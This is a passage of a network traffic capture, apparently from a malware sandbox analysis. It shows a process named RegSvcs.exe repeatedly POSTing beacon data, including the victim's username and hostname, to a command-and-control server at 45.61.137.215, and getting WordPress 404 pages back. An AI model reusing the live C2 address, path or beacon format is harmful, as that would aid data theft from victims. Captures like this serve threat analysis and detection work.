May 29, 2024 15:43:57.950299025 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:57.950335979 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:57.950346947 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:57.950357914 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:57.950368881 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:43:57.950382948 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 29, 2024 15:43:57.950392962 CEST	108	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 29, 2024 15:43:57.950427055 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:57.950453997 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.9	49756	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:58.198556900 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:58.210539103 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:00.739684105 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:58 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:00.739712000 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:00.739722967 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:00.739732981 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:44:00.739743948 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:44:00.739757061 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:44:00.739984989 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:00.740019083 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:00.740030050 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:00.740041018 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.9	49757	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:00.934566021 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:00.941057920 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:03.554755926 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:01 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:03.554774046 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:03.554785967 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:03.554796934 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:03.554809093 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:03.554920912 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:03.554934025 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:03.554945946 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:03.555242062 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:44:03.555274963 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.9	49758	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:03.719372988 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:03.724325895 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:06.246373892 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:04 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' 